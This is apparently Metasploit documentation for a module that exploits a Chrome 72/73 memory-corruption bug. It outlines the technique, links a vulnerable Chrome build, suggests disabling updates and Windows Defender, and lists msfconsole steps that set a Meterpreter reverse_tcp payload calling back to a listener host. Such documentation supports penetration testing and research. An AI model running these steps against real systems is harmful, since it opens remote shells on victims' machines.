Path: blob/master/documentation/modules/exploit/multi/browser/chrome_array_map.md
19534 views
This module exploits an issue in Chrome 73.0.3683.86 (64 bit). The exploit corrupts the length of a float in order to modify the backing store of a typed array. The typed array can then be used to read and write arbitrary memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload.
The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.
Vulnerable Application
The module is compatible with any 64bit Google Chrome (version 72 or 73), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified.
Vulnerable Application Installation Steps
You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_73.0.3683.86-21785/
You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.
Verification Steps
Do:
use exploit/multi/browser/chrome_array_mapDo:
set payload windows/x64/meterpreter/reverse_tcpDo:
set LHOST [IP]Do:
set SRVHOST [IP]Do:
set URIPATH / [PATH]Do:
run
Scenarios
Windows 10 and Google Chrome 73.0.3683.86 with --no-sandbox
Start Google Chrome without a sandbox: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox